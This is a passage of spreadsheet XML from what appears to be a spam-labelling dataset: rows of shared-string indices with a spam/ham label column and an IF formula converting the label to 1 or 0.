      <c r="B820" t="s">
        <v>5294</v>
      </c>
      <c r="C820" s="1">
        <f>IF(B820="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A821" t="s">
        <v>6098</v>
      </c>
      <c r="B821" t="s">
        <v>5294</v>
      </c>
      <c r="C821" s="1">
        <f>IF(B821="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A822" t="s">
        <v>6099</v>
      </c>
      <c r="B822" t="s">
        <v>5294</v>
      </c>
      <c r="C822" s="1">
        <f>IF(B822="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A823" t="s">
        <v>6100</v>
      </c>
      <c r="B823" t="s">
        <v>5294</v>
      </c>
      <c r="C823" s="1">
        <f>IF(B823="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A824" t="s">
        <v>6101</v>
      </c>
      <c r="B824" t="s">
        <v>5297</v>
      </c>
      <c r="C824" s="1">
        <f>IF(B824="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A825" t="s">
        <v>6102</v>
      </c>
      <c r="B825" t="s">
        <v>5297</v>
      </c>
      <c r="C825" s="1">
        <f>IF(B825="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A826" t="s">
        <v>5953</v>
      </c>
      <c r="B826" t="s">
        <v>5294</v>
      </c>
      <c r="C826" s="1">
        <f>IF(B826="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A827" t="s">
        <v>6103</v>
      </c>
      <c r="B827" t="s">
        <v>5294</v>
      </c>
      <c r="C827" s="1">
        <f>IF(B827="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A828" t="s">
        <v>6104</v>
      </c>
      <c r="B828" t="s">
        <v>5294</v>
      </c>
      <c r="C828" s="1">
        <f>IF(B828="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A829" t="s">
        <v>6105</v>
      </c>
      <c r="B829" t="s">
        <v>5294</v>
      </c>
      <c r="C829" s="1">
        <f>IF(B829="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A830" t="s">
        <v>6106</v>
      </c>
      <c r="B830" t="s">
        <v>5294</v>
      </c>
      <c r="C830" s="1">
        <f>IF(B830="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A831" t="s">
        <v>6107</v>
      </c>
      <c r="B831" t="s">
        <v>5294</v>
      </c>
      <c r="C831" s="1">
        <f>IF(B831="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A832" t="s">
        <v>6108</v>
      </c>
      <c r="B832" t="s">
        <v>5297</v>
      </c>
      <c r="C832" s="1">
        <f>IF(B832="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A833" t="s">
        <v>6109</v>
      </c>
      <c r="B833" t="s">
        <v>5294</v>
      </c>
      <c r="C833" s="1">
        <f>IF(B833="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A834" t="s">
        <v>6110</v>
      </c>
      <c r="B834" t="s">
        <v>5297</v>
      </c>
      <c r="C834" s="1">
        <f>IF(B834="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A835" t="s">
        <v>6111</v>
      </c>
      <c r="B835" t="s">
        <v>5294</v>
      </c>
      <c r="C835" s="1">
        <f>IF(B835="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A836" t="s">
        <v>6112</v>
      </c>
      <c r="B836" t="s">
        <v>5294</v>
      </c>
      <c r="C836" s="1">
        <f>IF(B836="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A837" t="s">
        <v>6113</v>
      </c>
      <c r="B837" t="s">
        <v>5294</v>
      </c>
      <c r="C837" s="1">
        <f>IF(B837="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A838" t="s">
        <v>6114</v>
      </c>
      <c r="B838" t="s">
        <v>5297</v>
      </c>
      <c r="C838" s="1">
        <f>IF(B838="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A839" t="s">
        <v>6115</v>
      </c>
      <c r="B839" t="s">
        <v>5294</v>
      </c>
      <c r="C839" s="1">
        <f>IF(B839="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A840" t="s">
        <v>6116</v>
      </c>
      <c r="B840" t="s">
        <v>5297</v>
      </c>
      <c r="C840" s="1">
        <f>IF(B840="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A841" t="s">
        <v>6117</v>
      </c>
      <c r="B841" t="s">
        <v>5297</v>
      </c>
      <c r="C841" s="1">
        <f>IF(B841="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A842" t="s">
        <v>6118</v>
      </c>
      <c r="B842" t="s">
        <v>5294</v>
      </c>
      <c r="C842" s="1">
        <f>IF(B842="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A843" t="s">
        <v>6119</v>
      </c>
      <c r="B843" t="s">
        <v>5294</v>
      </c>
      <c r="C843" s="1">
        <f>IF(B843="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A844" t="s">
        <v>6120</v>
      </c>
      <c r="B844" t="s">
        <v>5294</v>
      </c>
      <c r="C844" s="1">
        <f>IF(B844="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A845" t="s">
        <v>6121</v>
      </c>
      <c r="B845" t="s">
        <v>5297</v>
      </c>
      <c r="C845" s="1">
        <f>IF(B845="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A846" t="s">
        <v>6122</v>
      </c>
      <c r="B846" t="s">
        <v>5294</v>
      </c>
      <c r="C846" s="1">
        <f>IF(B846="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A847" t="s">
        <v>6123</v>
      </c>
      <c r="B847" t="s">
        <v>5294</v>
      </c>
      <c r="C847" s="1">
        <f>IF(B847="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A848" t="s">
        <v>6124</v>
      </c>
      <c r="B848" t="s">
        <v>5294</v>
      </c>
      <c r="C848" s="1">
        <f>IF(B848="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A849" t="s">
        <v>6125</v>
      </c>
      <c r="B849" t="s">
        <v>5294</v>
      </c>
      <c r="C849" s="1">
        <f>IF(B849="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A850" t="s">
        <v>6126</v>
      </c>
      <c r="B850" t="s">
        <v>5294</v>
      </c>
      <c r="C850" s="1">
        <f>IF(B850="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A851" t="s">
        <v>5814</v>
      </c>
      <c r="B851" t="s">
        <v>5297</v>
      </c>
      <c r="C851" s="1">
        <f>IF(B851="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A852" t="s">
        <v>6127</v>
      </c>
      <c r="B852" t="s">
        <v>5294</v>
      </c>
      <c r="C852" s="1">
        <f>IF(B852="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A853" t="s">
        <v>6128</v>
      </c>
      <c r="B853" t="s">
        <v>5294</v>
      </c>
      <c r="C853" s="1">
        <f>IF(B853="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A854" t="s">
        <v>6129</v>
      </c>
      <c r="B854" t="s">
        <v>5294</v>
      </c>
      <c r="C854" s="1">
        <f>IF(B854="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A855" t="s">
        <v>6130</v>
      </c>
      <c r="B855" t="s">
        <v>5294</v>
      </c>
      <c r="C855" s="1">
        <f>IF(B855="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A856" t="s">
        <v>6131</v>
      </c>
      <c r="B856" t="s">
        <v>5294</v>
      </c>
      <c r="C856" s="1">
        <f>IF(B856="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A857" t="s">
        <v>6132</v>
      </c>
      <c r="B857" t="s">
        <v>5297</v>
      </c>
      <c r="C857" s="1">
        <f>IF(B857="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A858" t="s">
        <v>6133</v>
      </c>
      <c r="B858" t="s">
        <v>5294</v>
      </c>
      <c r="C858" s="1">
        <f>IF(B858="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A859" t="s">
        <v>6134</v>
      </c>
      <c r="B859" t="s">
        <v>5294</v>
      </c>
      <c r="C859" s="1">
        <f>IF(B859="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A860" t="s">
        <v>6135</v>
      </c>
      <c r="B860" t="s">
        <v>5294</v>
      </c>
      <c r="C860" s="1">
        <f>IF(B860="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A861" t="s">
        <v>6136</v>
      </c>
      <c r="B861" t="s">
        <v>5294</v>
      </c>
      <c r="C861" s="1">
        <f>IF(B861="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A862" t="s">
        <v>6137</v>
      </c>
      <c r="B862" t="s">
        <v>5294</v>
      </c>
      <c r="C862" s="1">
        <f>IF(B862="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A863" t="s">
        <v>6138</v>
      </c>
      <c r="B863" t="s">
        <v>5294</v>
      </c>
      <c r="C863" s="1">
        <f>IF(B863="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A864" t="s">
        <v>6139</v>
      </c>
      <c r="B864" t="s">
        <v>5294</v>
      </c>
      <c r="C864" s="1">
        <f>IF(B864="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A865" t="s">
        <v>6140</v>
      </c>
      <c r="B865" t="s">
        <v>5294</v>
      </c>
      <c r="C865" s="1">
        <f>IF(B865="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A866" t="s">
        <v>6141</v>
      </c>
      <c r="B866" t="s">
        <v>5294</v>
      </c>
      <c r="C866" s="1">
        <f>IF(B866="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A867" t="s">
        <v>6142</v>
      </c>
      <c r="B867" t="s">
        <v>5297</v>
      </c>
      <c r="C867" s="1">
        <f>IF(B867="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A868" t="s">
        <v>6143</v>
      </c>
      <c r="B868" t="s">
        <v>5294</v>
      </c>
      <c r="C868" s="1">
        <f>IF(B868="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A869" t="s">
        <v>6144</v>
      </c>
      <c r="B869" t="s">
        <v>5297</v>
      </c>
      <c r="C869" s="1">
        <f>IF(B869="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A870" t="s">
        <v>6145</v>
      </c>
      <c r="B870" t="s">
        <v>5297</v>
      </c>
      <c r="C870" s="1">
        <f>IF(B870="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A871" t="s">
        <v>6146</v>
      </c>
      <c r="B871" t="s">
        <v>5297</v>
      </c>
      <c r="C871" s="1">
        <f>IF(B871="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A872" t="s">
        <v>6147</v>
      </c>
      <c r="B872" t="s">
        <v>5294</v>
      </c>
      <c r="C872" s="1">
        <f>IF(B872="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A873" t="s">
        <v>6148</v>
      </c>
      <c r="B873" t="s">
        <v>5294</v>
      </c>
      <c r="C873" s="1">
        <f>IF(B873="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A874" t="s">
        <v>6149</v>
      </c>
      <c r="B874" t="s">
        <v>5294</v>
      </c>
      <c r="C874" s="1">
        <f>IF(B874="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A875" t="s">
        <v>6150</v>
      </c>
      <c r="B875" t="s">
        <v>5294</v>
      </c>
      <c r="C875" s="1">
        <f>IF(B875="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A876" t="s">
        <v>6151</v>
      </c>
      <c r="B876" t="s">
        <v>5294</v>
      </c>
      <c r="C876" s="1">
        <f>IF(B876="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A877" t="s">
        <v>6152</v>
      </c>
      <c r="B877" t="s">
        <v>5297</v>
      </c>
      <c r="C877" s="1">
        <f>IF(B877="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A878" t="s">
        <v>6153</v>
      </c>
      <c r="B878" t="s">
        <v>5294</v>
      </c>
      <c r="C878" s="1">
        <f>IF(B878="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A879" t="s">
        <v>6154</v>
      </c>
      <c r="B879" t="s">
        <v>5297</v>
      </c>
      <c r="C879" s="1">
        <f>IF(B879="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A880" t="s">
        <v>6155</v>
      </c>
      <c r="B880" t="s">
        <v>5297</v>
      </c>
      <c r="C880" s="1">
        <f>IF(B880="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A881" t="s">
        <v>6156</v>
      </c>
      <c r="B881" t="s">
        <v>5297</v>
      </c>
      <c r="C881" s="1">
        <f>IF(B881="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A882" t="s">
        <v>6157</v>
      </c>
      <c r="B882" t="s">
        <v>5297</v>
      </c>
      <c r="C882" s="1">
        <f>IF(B882="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A883" t="s">
        <v>6158</v>
      </c>
      <c r="B883" t="s">
        <v>5294</v>
      </c>
      <c r="C883" s="1">
        <f>IF(B883="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A884" t="s">
        <v>6159</v>
      </c>
      <c r="B884" t="s">
        <v>5294</v>
      </c>
      <c r="C884" s="1">
        <f>IF(B884="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A885" t="s">
        <v>6160</v>
      </c>
      <c r="B885" t="s">
        <v>5294</v>
      </c>
      <c r="C885" s="1">
        <f>IF(B885="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A886" t="s">
        <v>6161</v>
      </c>
      <c r="B886" t="s">
        <v>5294</v>
      </c>
      <c r="C886" s="1">
        <f>IF(B886="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A887" t="s">
        <v>6162</v>
      </c>
      <c r="B887" t="s">
        <v>5294</v>
      </c>
      <c r="C887" s="1">
        <f>IF(B887="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A888" t="s">
        <v>6163</v>
      </c>
      <c r="B888" t="s">
        <v>5294</v>
      </c>
      <c r="C888" s="1">
        <f>IF(B888="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A889" t="s">
        <v>6164</v>
      </c>
      <c r="B889" t="s">
        <v>5294</v>
      </c>
      <c r="C889" s="1">
        <f>IF(B889="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A890" t="s">
        <v>6165</v>
      </c>
      <c r="B890" t="s">
        <v>5294</v>
      </c>
      <c r="C890" s="1">
        <f>IF(B890="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A891" t="s">
        <v>6166</v>
      </c>
      <c r="B891" t="s">
        <v>5294</v>
      </c>
      <c r="C891" s="1">
        <f>IF(B891="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A892" t="s">
        <v>6167</v>
      </c>
      <c r="B892" t="s">
        <v>5294</v>
      </c>
      <c r="C892" s="1">
        <f>IF(B892="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A893" t="s">
        <v>6168</v>
      </c>
      <c r="B893" t="s">
        <v>5294</v>
      </c>
      <c r="C893" s="1">
        <f>IF(B893="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A894" t="s">
        <v>6169</v>
      </c>
      <c r="B894" t="s">
        <v>5294</v>
      </c>
      <c r="C894" s="1">
        <f>IF(B894="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A895" t="s">
        <v>6170</v>
      </c>
      <c r="B895" t="s">
        <v>5294</v>
      </c>
      <c r="C895" s="1">
        <f>IF(B895="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A896" t="s">
        <v>6171</v>
      </c>
      <c r="B896" t="s">
        <v>5294</v>
      </c>
      <c r="C896" s="1">
        <f>IF(B896="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A897" t="s">
        <v>6172</v>
      </c>
      <c r="B897" t="s">
        <v>5294</v>
      </c>
      <c r="C897" s="1">
        <f>IF(B897="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A898" t="s">
        <v>6173</v>
      </c>
      <c r="B898" t="s">
        <v>5294</v>
      </c>
      <c r="C898" s="1">
        <f>IF(B898="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A899" t="s">
        <v>6174</v>
      </c>
      <c r="B899" t="s">
        <v>5294</v>
      </c>
      <c r="C899" s="1">
        <f>IF(B899="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A900" t="s">
        <v>6175</v>
      </c>
      <c r="B900" t="s">
        <v>5294</v>
      </c>
      <c r="C900" s="1">
        <f>IF(B900="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A901" t="s">
        <v>5391</v>
      </c>
      <c r="B901" t="s">
        <v>5297</v>
      </c>
      <c r="C901" s="1">
        <f>IF(B901="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A902" t="s">
        <v>6176</v>
      </c>
      <c r="B902" t="s">
        <v>5294</v>
      </c>
      <c r="C902" s="1">
        <f>IF(B902="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A903" t="s">
        <v>6177</v>
      </c>
      <c r="B903" t="s">
        <v>5294</v>
      </c>
      <c r="C903" s="1">
        <f>IF(B903="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A904" t="s">
        <v>6178</v>
      </c>
      <c r="B904" t="s">
        <v>5294</v>
      </c>
      <c r="C904" s="1">
        <f>IF(B904="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A905" t="s">
        <v>6179</v>
      </c>
      <c r="B905" t="s">
        <v>5294</v>
      </c>
      <c r="C905" s="1">
        <f>IF(B905="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A906" t="s">
        <v>6180</v>
      </c>
      <c r="B906" t="s">
        <v>5294</v>
      </c>
      <c r="C906" s="1">
        <f>IF(B906="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A907" t="s">
        <v>6181</v>
      </c>
      <c r="B907" t="s">
        <v>5294</v>
      </c>
      <c r="C907" s="1">
        <f>IF(B907="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A908" t="s">
        <v>6182</v>
      </c>
      <c r="B908" t="s">
        <v>5297</v>
      </c>
      <c r="C908" s="1">
        <f>IF(B908="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A909" t="s">
        <v>6183</v>
      </c>
      <c r="B909" t="s">
        <v>5294</v>
      </c>
      <c r="C909" s="1">
        <f>IF(B909="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A910" t="s">
        <v>6184</v>
      </c>
      <c r="B910" t="s">
        <v>5294</v>
      </c>
      <c r="C910" s="1">
        <f>IF(B910="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A911" t="s">
        <v>6185</v>
      </c>
      <c r="B911" t="s">
        <v>5297</v>
      </c>
      <c r="C911" s="1">
        <f>IF(B911="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A912" t="s">
        <v>6186</v>
      </c>
      <c r="B912" t="s">
        <v>5294</v>
      </c>
      <c r="C912" s="1">
        <f>IF(B912="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A913" t="s">
        <v>6187</v>
      </c>
      <c r="B913" t="s">
        <v>5294</v>
      </c>
      <c r="C913" s="1">
        <f>IF(B913="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A914" t="s">
        <v>6188</v>
      </c>
      <c r="B914" t="s">
        <v>5294</v>
      </c>
      <c r="C914" s="1">
        <f>IF(B914="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A915" t="s">
        <v>6189</v>
      </c>
      <c r="B915" t="s">
        <v>5294</v>
      </c>
      <c r="C915" s="1">
        <f>IF(B915="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A916" t="s">
        <v>6190</v>
      </c>
      <c r="B916" t="s">
        <v>5294</v>
      </c>
      <c r="C916" s="1">
        <f>IF(B916="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A917" t="s">
        <v>6191</v>
      </c>
      <c r="B917" t="s">
        <v>5294</v>
      </c>
      <c r="C917" s="1">
        <f>IF(B917="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A918" t="s">
        <v>6192</v>
      </c>
      <c r="B918" t="s">
        <v>5294</v>
      </c>
      <c r="C918" s="1">
        <f>IF(B918="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A919" t="s">
        <v>6193</v>
      </c>
      <c r="B919" t="s">
        <v>5294</v>
      </c>
      <c r="C919" s="1">
        <f>IF(B919="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A920" t="s">
        <v>6194</v>
      </c>
      <c r="B920" t="s">
        <v>5294</v>
      </c>
      <c r="C920" s="1">
        <f>IF(B920="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A921" t="s">
        <v>6195</v>
      </c>
      <c r="B921" t="s">
        <v>5294</v>
      </c>
      <c r="C921" s="1">
        <f>IF(B921="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="922" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A922" t="s">
        <v>6196</v>
      </c>
      <c r="B922" t="s">
        <v>5294</v>
      </c>
      <c r="C922" s="1">
        <f>IF(B922="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A923" t="s">
        <v>6197</v>
      </c>
      <c r="B923" t="s">
        <v>5294</v>
      </c>
      <c r="C923" s="1">
        <f>IF(B923="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A924" t="s">
        <v>6198</v>
      </c>
      <c r="B924" t="s">
        <v>5294</v>
      </c>
      <c r="C924" s="1">
        <f>IF(B924="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A925" t="s">
        <v>6199</v>
      </c>
      <c r="B925" t="s">
        <v>5294</v>
      </c>
      <c r="C925" s="1">
        <f>IF(B925="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A926" t="s">
        <v>6200</v>
      </c>
      <c r="B926" t="s">
        <v>5294</v>
      </c>
      <c r="C926" s="1">
        <f>IF(B926="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="927" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A927" t="s">
        <v>6201</v>
      </c>
      <c r="B927" t="s">
        <v>5294</v>
      </c>
      <c r="C927" s="1">
        <f>IF(B927="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A928" t="s">
